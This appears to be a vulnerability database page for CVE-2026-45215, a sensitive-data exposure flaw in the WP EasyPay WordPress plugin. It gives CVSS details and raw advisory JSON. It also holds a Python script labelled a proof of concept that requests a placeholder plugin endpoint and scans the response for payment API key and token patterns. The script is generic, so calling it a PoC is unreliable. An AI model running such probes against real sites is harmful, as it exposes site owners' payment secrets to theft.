Security Vulnerability Report
中文
CVE-2026-45215 CVSS 5.3 MEDIUM

CVE-2026-45215

Published: 2026-05-12 11:16:21
Last Modified: 2026-05-12 14:03:53

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data.This issue affects WP EasyPay: from n/a through <= 4.3.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP EasyPay <= 4.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ Proof of Concept for CVE-2026-45215 Checks if sensitive data is exposed in the response. """ try: # Send a GET request to the vulnerable endpoint response = requests.get(target_url, timeout=10) if response.status_code == 200: content = response.text # Define common sensitive patterns (e.g., API keys, tokens) # These patterns should be adjusted based on the specific plugin behavior patterns = ['sk_live_', 'pk_live_', 'secret_key', 'api_token'] found = False for pattern in patterns: if pattern in content: print(f"[+] Potential sensitive data found: {pattern}") found = True if not found: print("[-] No obvious sensitive data patterns detected in response.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Replace with the actual target URL url = "http://example.com/wp-content/plugins/wp-easy-pay/vulnerable-endpoint" check_vulnerability(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45215", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.977", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data.This issue affects WP EasyPay: from n/a through <= 4.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-easy-pay/vulnerability/wordpress-wp-easypay-plugin-4-3-0-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}